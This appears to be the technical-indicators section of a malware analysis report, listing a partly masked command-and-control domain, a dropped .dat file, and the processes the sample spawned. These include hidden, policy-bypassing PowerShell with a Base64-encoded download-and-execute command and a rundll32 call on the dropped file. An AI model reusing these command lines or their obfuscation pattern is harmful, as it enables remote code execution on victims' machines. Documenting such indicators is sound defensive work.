Technical information
- http://ma###onte.top/444g100/index.php
- %TEMP%\xmohkb.dat
- 'ma###onte.top':80
- http://ma###onte.top/444g100/main.php
- DNS ASK ma###onte.top
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...' (with a hidden window)
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBh...
- '<SYSTEM32>\rundll32.exe' %TEMP%\XmOHKb.dat f1